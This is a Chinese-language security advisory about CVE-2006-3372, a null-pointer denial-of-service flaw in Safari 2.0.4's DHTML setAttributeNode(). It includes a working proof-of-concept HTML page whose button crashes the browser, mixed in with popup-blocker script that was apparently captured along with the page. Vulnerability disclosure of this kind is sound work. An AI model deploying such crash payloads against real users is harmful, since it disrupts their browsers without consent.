Apple Safari Web Browser DHTML SetAttributeNode()空指针引用拒绝服务漏洞
发布日期:2006-07-05
更新日期:2007-07-05
受影响系统:Apple Safari 2.0.4
描述:
BUGTRAQ ID:
18822
CVE(CAN) ID:
CVE-2006-3372
Safari是苹果计算机的最新作业系统Mac OS X中的浏览器,使用了KDE的KHTML作为浏览器的运算核心。
Apple Safari Web浏览器在解析某些解析DHTML元素时存在空指针引用引起的拒绝服务漏洞,攻击者可利用此漏洞使受影响浏览器崩溃。
<*来源:Dennis Cox
链接:
http://xforce.iss.net/xforce/xfdb/27594
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script language="JavaScript">
<!--
function SymError()
{
return true;
}
window.onerror = SymError;
var SymRealWinOpen = window.open;
function SymWinOpen(url, name, attributes)
{
return (new Object());
}
window.open = SymWinOpen;
//-->
</script>
<script>
// MoBB Demonstration
function Demo() {
var a = document.createElement("a");
a.setAttributeNode();
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
</body></html>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;
function SymOnUnload()
{
window.open = SymWinOpen;
if(SymRealOnUnload != null)
SymRealOnUnload();
}
function SymOnLoad()
{
if(SymRealOnLoad != null)
SymRealOnLoad();
window.open = SymRealWinOpen;
SymRealOnUnload = window.onunload;
window.onunload = SymOnUnload;
}
SymRealOnLoad = window.onload;
window.onload = SymOnLoad;
//-->
</script>
建议:
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://support.apple.com/浏览次数:2138
严重程度:0(网友投票)
